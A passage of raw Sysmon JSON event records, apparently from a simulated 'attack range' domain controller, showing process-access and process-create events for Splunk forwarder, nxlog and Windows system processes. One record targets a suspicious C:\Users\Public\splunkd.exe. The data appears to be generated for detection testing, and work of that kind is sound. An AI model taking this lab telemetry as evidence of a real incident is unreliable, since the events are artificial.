07:00:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7508,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:57.887\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:57.887","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7509,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:57.887\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1329-5F25-0000-0010AB7D0B00}\r\nTargetProcessId: 4932\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:57.887","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1329-5F25-0000-0010AB7D0B00}","TargetProcessId":"4932","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7510,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:58.621\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:58.621","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7511,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:59.028\r\nProcessGuid: {E2A3D6B1-132B-5F25-0000-0010AE7F0B00}\r\nProcessId: 4968\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:00:59.028","ProcessGuid":"{E2A3D6B1-132B-5F25-0000-0010AE7F0B00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7512,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:59.027\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-132B-5F25-0000-0010AE7F0B00}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:59.027","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-132B-5F25-0000-0010AE7F0B00}","TargetProcessId":"4968","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7513,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:59.027\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-132B-5F25-0000-0010AE7F0B00}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:59.027","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-132B-5F25-0000-0010AE7F0B00}","TargetProcessId":"4968","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7514,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:59.027\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:59.027","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7515,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:59.027\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:59.027","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7516,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:59.027\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 